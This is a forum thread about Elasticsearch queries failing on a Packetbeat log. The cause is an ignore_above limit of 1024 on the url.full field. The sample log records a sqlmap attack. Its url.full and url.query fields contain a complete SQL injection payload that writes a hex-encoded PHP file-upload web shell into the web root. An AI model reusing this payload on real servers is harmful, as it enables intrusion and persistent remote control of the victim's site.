I need help! Elasticsearch does not match my regexp, wildcard, or query_string queries

I use elasticsearch version: "7.8.0, Build: default/deb/757314695644ea9a1dc2fecd26d1a43856725e65/2020-06-14T19:35:50.234439Z, JVM: 14.0.1" and I have the following document according to the packetbeat index (I have cut it off at the http.response.content due to the character limit).

{
        "_index" : "packetbeat-7.8.0-2020.07.01",
        "_type" : "_doc",
        "_id" : "P3LrCHMB2KTf0bW9OD9m",
        "_score" : 0.0,
        "_source" : {
          "source" : {
            "bytes" : 1909,
            "ip" : "10.0.0.2",
            "port" : 56150
          },
          "agent" : {
            "type" : "packetbeat",
            "ephemeral_id" : "47786d95-ac76-40bf-a031-7b7cfe9ba7cc",
            "hostname" : "blueprint-energetic-bear",
            "id" : "8d123479-14f2-4ad4-9617-adc8bcd9f779",
            "version" : "7.8.0",
            "name" : "blueprint-energetic-bear"
          },
          "event" : {
            "dataset" : "http",
            "kind" : "event",
            "timezone" : "+00:00",
            "duration" : 446962000,
            "end" : "2020-07-01T05:48:19.311Z",
            "category" : "network_traffic",
            "start" : "2020-07-01T05:48:18.864Z"
          },
          "@version" : "1",
          "process" : {
            "ppid" : 1492,
            "pid" : 25800,
            "args" : [
              "/usr/sbin/apache2",
              "-k",
              "start"
            ],
            "executable" : "/usr/sbin/apache2",
            "name" : "apache2",
            "start" : "2020-07-01T05:46:27.090Z"
          },
          "server" : {
            "bytes" : 7840,
            "ip" : "10.0.2.128",
            "port" : 80
          },
          "method" : "post",
          "user_agent" : {
            "original" : "sqlmap/1.4.6.12#dev (http://sqlmap.org)"
          },
          "tags" : [
            "beats_input_raw_event"
          ],
          "query" : "POST /php/recherche_old.php",
          "@timestamp" : "2020-07-01T05:48:18.864Z",
          "http" : {
            "request" : {
              "method" : "post",
              "bytes" : 1909,
              "headers" : {
                "content-type" : "application/x-www-form-urlencoded; charset=utf-8",
                "host" : "10.0.2.128",
                "accept" : "*/*",
                "cache-control" : "no-cache",
                "connection" : "close",
                "user-agent" : "sqlmap/1.4.6.12#dev (http://sqlmap.org)",
                "content-length" : 1578,
                "accept-encoding" : "gzip,deflate",
                "cookie" : {
                  "phpsessid" : "begagnst506sh1rq7u0elabda4"
                }
              },
              "body" : {
                "bytes" : 1578
              }
            },
            "response" : {
              "bytes" : 7840,
              "status_phrase" : "ok",
              "status_code" : 200,
              "headers" : {
                "expires" : "Thu, 19 Nov 1981 08:52:00 GMT",
                "content-type" : "text/html; charset=UTF-8",
                "cache-control" : "no-store, no-cache, must-revalidate, post-check=0, pre-check=0",
                "date" : "Wed, 01 Jul 2020 05:48:19 GMT",
                "server" : "Apache/2.4.29 (Ubuntu)",
                "pragma" : "no-cache",
                "connection" : "close",
                "content-length" : 7476,
                "x-powered-by" : "PHP/5.6.40-29+ubuntu18.04.1+deb.sury.org+1"
              },
              "body" : {
                "bytes" : 7476,
                "content" : "..."
              }
            },
            "version" : "1.1"
          },
          "type" : "http",
          "ecs" : {
            "version" : "1.5.0"
          },
          "client" : {
            "bytes" : 1909,
            "ip" : "10.0.0.2",
            "port" : 56150
          },
          "host" : {
            "name" : "blueprint-energetic-bear"
          },
          "status" : "OK",
          "network" : {
            "type" : "ipv4",
            "bytes" : 9749,
            "community_id" : "1:S2jWpKsNyeAykrZPa+4yC6DWBE8=",
            "direction" : "inbound",
            "transport" : "tcp",
            "protocol" : "http"
          },
          "url" : {
            "scheme" : "http",
            "full" : "http://10.0.2.128/php/recherche_old.php?btnRechercher=Rechercher&recherche=dac%27+LIMIT+0%2C1+INTO+OUTFILE+%27%2Fvar%2Fwww%2Fhtml%2Fphp%2Ftmpuyazr.php%27+LINES+TERMINATED+BY+0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f68746d6c2f7068702f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+-",
            "domain" : "10.0.2.128",
            "path" : "/php/recherche_old.php",
            "query" : "btnRechercher=Rechercher&recherche=dac%27+LIMIT+0%2C1+INTO+OUTFILE+%27%2Fvar%2Fwww%2Fhtml%2Fphp%2Ftmpuyazr.php%27+LINES+TERMINATED+BY+0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f68746d6c2f7068702f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+-"
          },
          "destination" : {
            "bytes" : 7840,
            "process" : {
              "ppid" : 1492,
              "pid" : 25800,
              "args" : [
                "/usr/sbin/apache2",
                "-k",
                "start"
              ],
              "executable" : "/usr/sbin/apache2",
              "name" : "apache2",
              "start" : "2020-07-01T05:46:27.090Z"
            },
            "ip" : "10.0.2.128",
            "port" : 80
          },
          "world" : "blueprint"
        }
      }

Now, if I try and query this document using any of the regexp, wildcard, or query_string queries I get very strange results. E.g. If I query the keyword field url.full using the regex .*recherche=.*LIMIT.* the query is unable to match the document. This is the case no matter if I use the regexp, wildcard, or query_string queries. I thought at first that something was wrong with the analyzer and that the field is somehow tokenized but the queries cannot even find a query such as http.* which it should find even if the field is analyzed according to the standard analyzer.

I would appreciate any help on the matter!

Thanks for the example doc.
Can you share the exact JSON for the index mapping and the query?
(Just the part for the url.full field will do)

Of course, below is the index mapping for the url field:

"url": {
          "properties": {
            "domain": {
              "type": "keyword",
              "ignore_above": 1024
            },
            "extension": {
              "type": "keyword",
              "ignore_above": 1024
            },
            "fragment": {
              "type": "keyword",
              "ignore_above": 1024
            },
            "full": {
              "type": "keyword",
              "fields": {
                "text": {
                  "type": "text",
                  "norms": false
                }
              },
              "ignore_above": 1024
            },
            "original": {
              "type": "keyword",
              "fields": {
                "text": {
                  "type": "text",
                  "norms": false
                }
              },
              "ignore_above": 1024
            },

And the query can cary based on if you use the wildcard, regexp, or query_string queries. However, a sample query could look something like:

{
  "size": 100,
  "query": {
    "bool": {
      "filter": [
        {
          "bool": {
            "must": [
              {
                "term": {
                  "agent.type": "packetbeat"
                }
              },
              {
                "term": {
                  "host.name": "blueprint-energetic-bear"
                }
              },
              {
                "term": {
                  "destination.port": 80
                }
              },
              {
                "term": {
                  "http.request.method": "post"
                }
              },
              {
                "term": {
                  "http.response.status_code": "200"
                }
              },
              {
                "query_string": {
                  "default_field": "url.full",
                  "query": "/.*recherche=.*LIMIT.*/"
                }
              }
            ]
          }
        }
      ]
    }
  }
}

Where the query_string can be replaced with any of the other mentioned queries (changing some syntax as well of course). Some regex patterns return the document while others that seem just as valid do not return the document.

Thanks.

That's the problem. The URL is 1600 characters long and so is thrown away by this indexing rule.

1 Like

Thank you so much Mark! This has been driving me crazy since yesterday!

1 Like

This topic was automatically closed 28 days after the last reply. New replies are no longer allowed.